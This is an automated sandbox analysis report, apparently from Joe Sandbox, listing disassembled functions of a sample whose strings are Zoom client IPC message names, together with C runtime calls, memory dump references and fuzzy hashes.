                • ?Int64ToString@Cmm@@YAH_JAAV?$CStringT@D@1@@Z.RWSNDPQSKZ(00000000,?,00D334D8,?,?,?,?,?,?,?,?,?,?,?,00000060), ref: 00CC0AAA
                  • Part of subcall function 00C64000: ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?), ref: 00C6404C
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(99999999-,11112222), ref: 00CC0AC7
                  • Part of subcall function 00C562D0: __EH_prolog3.LIBCMT ref: 00C562D7
                • ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$CStringT@D@2@@Z.RWSNDPQSKZ(?,?,?,?,?,-000000000000,?,00000004,00D3E108,?,00000004,00D3E108,?,00000004), ref: 00CC0B61
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,-000000000000,?,00000004,00D3E108,?,00000004,00D3E108,?,00000004), ref: 00CC0B77
                • ?GetNakedGUID@CmmGUID@Cmm@@AAE?AV?$CStringT@_W@2@ABV32@@Z.RWSNDPQSKZ(?,?,?,?,00000060), ref: 00CC0BC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$V12@$Now@Time$Assign@?$Ticks@Time@$??0?$AssignD@1@@D@2@@H_prolog3H_prolog3_Int64NakedOther@?$String@V32@@W@2@
                • String ID: -000000000000$11112222$99999999-
                • API String ID: 2818522883-2364856699
                • Opcode ID: 2ab918cfd0a88bd9623ded13ea5afee3dc9e26e7c1eab5e8ae51a83218c16d38
                • Instruction ID: af0837f711179d9daf2d948d2c9d0545216b6dbf5ffbb4e902d8f05e39505ac1
                • Opcode Fuzzy Hash: 2ab918cfd0a88bd9623ded13ea5afee3dc9e26e7c1eab5e8ae51a83218c16d38
                • Instruction Fuzzy Hash: 9F4148B5D00309DBCB14EFE4D996AEDB7B4AF18309F54041DE406B7282DB70AA89DB25
                Function 00C8E165 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E16C
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6DD81), ref: 00C8E180
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.receive.realtime.policies.notication), ref: 00C8E1B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ ref: 00C8E1EF
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.receive.realtime.policies.notication), ref: 00C8E221
                • EnterCriticalSection.KERNEL32(?), ref: 00C8E283
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8E2A0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C8E2B3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Callid$Policies$com.zoom.app.assistant.sip.receive.realtime.policies.notication
                • API String ID: 1443623190-1536302961
                • Opcode ID: d74fd6e84a1029c7d0c4a20619a5a737cc0ab0e1e84af2b5d80c671c26c731d2
                • Instruction ID: 8df2d202284678e7e406b308bde6f9e9d99b678b2e66c9a8d3373abb4ccc7b72
                • Opcode Fuzzy Hash: d74fd6e84a1029c7d0c4a20619a5a737cc0ab0e1e84af2b5d80c671c26c731d2
                • Instruction Fuzzy Hash: 4741B075D00718DFCB14EFA4C849ADDBBB4AF44319F044128E812B7391DF709A8ADBA9
                Function 00C9229D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C922A4
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71891), ref: 00C922B8
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.change.barge.em.call.status.notification), ref: 00C922EA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ ref: 00C92327
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.change.barge.em.call.status.notification), ref: 00C92359
                • EnterCriticalSection.KERNEL32(?), ref: 00C923BB
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C923D8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C923EB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: BeginTime$Status$com.zoom.app.assistant.sip.change.barge.em.call.status.notification
                • API String ID: 1443623190-3606876921
                • Opcode ID: 55dc03148ecd3002410ce14bae68a6c94590e27c7febc4a7f98edb1ead4b1eb1
                • Instruction ID: 7a8e96b4831e07228f868ec46feda95d9e169a19c4ae39ff5d1cb202189b2f97
                • Opcode Fuzzy Hash: 55dc03148ecd3002410ce14bae68a6c94590e27c7febc4a7f98edb1ead4b1eb1
                • Instruction Fuzzy Hash: 5A41C275D00708AFCF14EFA4D849AEDBBB4BF08315F044118E812A7391DF749A8AEB65
                Function 00C6C650 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 32windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C657
                • ??0?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,000027D6,result,mixedFMName,userFMName,shareFMName,smapleRate,samplesPerFrame,sampleDepth,00000004), ref: 00C6C68E
                  • Part of subcall function 00C7C020: __EH_prolog3.LIBCMT ref: 00C7C027
                  • Part of subcall function 00C7C020: ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000004,00C6C693,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,000027D6,result,mixedFMName,userFMName,shareFMName), ref: 00C7C049
                  • Part of subcall function 00C8C6F2: __EH_prolog3_GS.LIBCMT ref: 00C8C6F9
                  • Part of subcall function 00C8C6F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C6DE), ref: 00C8C70D
                  • Part of subcall function 00C8C6F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C73F
                  • Part of subcall function 00C8C6F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C77C
                  • Part of subcall function 00C8C6F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C7AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$H0000000@H000000@H_prolog3_Node@23@Root@Template_6@Template_7@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.register.response$maxChannel$mixedFMName$result$sampleDepth$samplesPerFrame$shareFMName$smapleRate$userFMName
                • API String ID: 477209010-1114125151
                • Opcode ID: b96595298fd02a1d02bcf88562e6a6d13a8c12450451cac71cef9da67d53260e
                • Instruction ID: cd672d94ed064ab21f69b96ce674b97ccf1cc60890bbbe11cbae41eb1c10ac18
                • Opcode Fuzzy Hash: b96595298fd02a1d02bcf88562e6a6d13a8c12450451cac71cef9da67d53260e
                • Instruction Fuzzy Hash: 3FF0F0B0A81350BFC720BF54E847B99B6A0AB14B19F08842CF2842A2C2CBF5854CD775
                Function 00C72DC0 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 32windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72DC7
                • ??0?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.captionchange.notify,00009E96,msgID,speakerID,displayName,text,source,language,timeStamp,00000004), ref: 00C72DFE
                  • Part of subcall function 00C7A1B0: __EH_prolog3.LIBCMT ref: 00C7A1B7
                  • Part of subcall function 00C7A1B0: ??0?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000004,00C72E03,com.zoom.app.cci.ccivideo.captionchange.notify,00009E96,msgID,speakerID,displayName,text), ref: 00C7A1D9
                  • Part of subcall function 00C930A2: __EH_prolog3_GS.LIBCMT ref: 00C930A9
                  • Part of subcall function 00C930A2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C72E4E), ref: 00C930BD
                  • Part of subcall function 00C930A2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00000044,00C72E4E), ref: 00C930EF
                  • Part of subcall function 00C930A2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C72E4E,-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00000044,00C72E4E), ref: 00C9312C
                  • Part of subcall function 00C930A2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00C72E4E,-00000004,com.zoom.app.cci.ccivideo.captionchange.notify,00000044,00C72E4E), ref: 00C9315E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@StringV12@$Archive$H_prolog3MessagePackageTree@$H0000000@H000000@H_prolog3_Node@23@Root@Template_6@Template_7@Tree
                • String ID: com.zoom.app.cci.ccivideo.captionchange.notify$displayName$language$msgID$source$speakerID$text$timeStamp$type
                • API String ID: 477209010-2462494478
                • Opcode ID: 389d4aa612d0cc77499a9fb33e69d9015e11a13d679046c4f67286bb85887bfd
                • Instruction ID: 328bb9a5f9e464f4be895076d13d79416267cced54d0985f83d03c2dfd3a01cc
                • Opcode Fuzzy Hash: 389d4aa612d0cc77499a9fb33e69d9015e11a13d679046c4f67286bb85887bfd
                • Instruction Fuzzy Hash: 2CF0AF75A90380FEC710ABA1EC06B5A76A0AB04F06F54C11CB2646A2D2CBF5454CDB31
                Function 00C76BE0 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76BE7
                • ??0?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z.RWSNDPQSKZ(com.zoom.app.pt.notify.meeting.call.response,000027B1,MsgType,senderJID,senderName,sessionID,msgID,tmServerside,meetingID,DeclineMessage,00000004), ref: 00C76C23
                  • Part of subcall function 00C786D0: __EH_prolog3.LIBCMT ref: 00C786D7
                  • Part of subcall function 00C786D0: ??0?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,00000004,00C76C28,com.zoom.app.pt.notify.meeting.call.response,000027B1,MsgType,senderJID,senderName), ref: 00C786FC
                  • Part of subcall function 00C95DF4: __EH_prolog3_GS.LIBCMT ref: 00C95DFB
                  • Part of subcall function 00C95DF4: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76C4F), ref: 00C95E0F
                  • Part of subcall function 00C95DF4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.pt.notify.meeting.call.response,00000044,00C76C4F), ref: 00C95E41
                  • Part of subcall function 00C95DF4: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C76C4F,-00000004,com.zoom.app.pt.notify.meeting.call.response,00000044,00C76C4F), ref: 00C95E7E
                  • Part of subcall function 00C95DF4: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.pt.notify.meeting.call.response,00C76C4F,-00000004,com.zoom.app.pt.notify.meeting.call.response,00000044,00C76C4F), ref: 00C95EB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$V12@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@V12@_$H00000000@H0000000@H_prolog3_Node@23@Root@Template_7@Template_8@Tree
                • String ID: DeclineMessage$MsgType$com.zoom.app.pt.notify.meeting.call.response$meetingID$msgID$senderJID$senderName$sessionID$tmServerside
                • API String ID: 337227705-2092952728
                • Opcode ID: 28b65c77b3888be99645c4539461313e6002ba13c6490e96b405a81c7f2b0adf
                • Instruction ID: 0dbcf3a8acd326e1a5a243a0f363541324114259dec2872019f674b74d1469bd
                • Opcode Fuzzy Hash: 28b65c77b3888be99645c4539461313e6002ba13c6490e96b405a81c7f2b0adf
                • Instruction Fuzzy Hash: 8AF065F17C8B947ECB25BB669C0FB1A25A0AB00F15F808538B604792C1CBF5554CD679
                Function 00CD68E0 Relevance: 18.2, APIs: 12, Instructions: 201COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00CADA21: __EH_prolog3.LIBCMT ref: 00CADA28
                  • Part of subcall function 00CADA21: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000008,00CAD7E1,?,0000002C,00CAC369,?,000000BC), ref: 00CADA4E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,9FB8111D,?,00000000,?), ref: 00CD6944
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD6953
                • std::_Lockit::_Lockit.LIBCPMT ref: 00CD6975
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD6996
                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00CD6A22
                • std::_Facet_Register.LIBCPMT ref: 00CD6A2F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000), ref: 00CD6A3E
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CD6A51
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CD6A60
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00CD6A7A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?), ref: 00CD6AAE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000004,00000000,00000000,9FB8111D,?,00000000,?), ref: 00CD6B62
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3LocinfoLocinfo::~_Register
                • String ID:
                • API String ID: 752974129-0
                • Opcode ID: ff539f0c264c1f236d0e0268e9c2a9bf0f819a37f0b85758ebf5dc10314d3a1d
                • Instruction ID: 8c456e6a30c3c7664d13e76b74484904716dff413192b12a9e15bf15956787ad
                • Opcode Fuzzy Hash: ff539f0c264c1f236d0e0268e9c2a9bf0f819a37f0b85758ebf5dc10314d3a1d
                • Instruction Fuzzy Hash: 2B819A75A00218DFCB14DF69C894BADBBF5FF48314F15805AE946AB3A1DB31AD05CB90
                Function 00CE86F8 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CE87F5
                • type_info::operator==.LIBVCRUNTIME ref: 00CE8817
                • ___TypeMatch.LIBVCRUNTIME ref: 00CE8926
                • CatchIt.LIBVCRUNTIME ref: 00CE8977
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CE89F8
                • _UnwindNestedFrames.LIBCMT ref: 00CE8A7C
                • CallUnexpected.LIBVCRUNTIME ref: 00CE8A97
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 4234981820-393685449
                • Opcode ID: 23aeb5ba16277604566974927106c9b36c17185cc30b72eab9b83406721110cf
                • Instruction ID: 7bd42ba7b480007f0e9c1ff2f922e2ff85fac75f421afe41814b31e629e8890d
                • Opcode Fuzzy Hash: 23aeb5ba16277604566974927106c9b36c17185cc30b72eab9b83406721110cf
                • Instruction Fuzzy Hash: 23B19F71C00289EFCF25DFA6C8819AEB7B5FF04310F14416AF8196B252DB31DA59EB91
                Function 00D0CBE8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00D0C8A1: CreateFileW.KERNEL32(00000000,00000000,?,00D0CC91,?,?,00000000,?,00D0CC91,00000000,0000000C), ref: 00D0C8BE
                • GetLastError.KERNEL32 ref: 00D0CCFC
                • __dosmaperr.LIBCMT ref: 00D0CD03
                • GetFileType.KERNEL32(00000000), ref: 00D0CD0F
                • GetLastError.KERNEL32 ref: 00D0CD19
                • __dosmaperr.LIBCMT ref: 00D0CD22
                • CloseHandle.KERNEL32(00000000), ref: 00D0CD42
                • CloseHandle.KERNEL32(00D03DE3), ref: 00D0CE8F
                • GetLastError.KERNEL32 ref: 00D0CEC1
                • __dosmaperr.LIBCMT ref: 00D0CEC8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: 3cef4b4f119d0e22b7ee4e154af7b0b657794d7309a16c1d86806999d90046b5
                • Instruction ID: 0607baa4a68d930d79540bed0bf376ab628b61e6b6f34b2ce52dbc5117029e6e
                • Opcode Fuzzy Hash: 3cef4b4f119d0e22b7ee4e154af7b0b657794d7309a16c1d86806999d90046b5
                • Instruction Fuzzy Hash: 46A12432A142489FDF199F68DC917AD3BA1AF06320F285259F805EB3E1CB34C902D775
                Function 00CB8960 Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 39COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
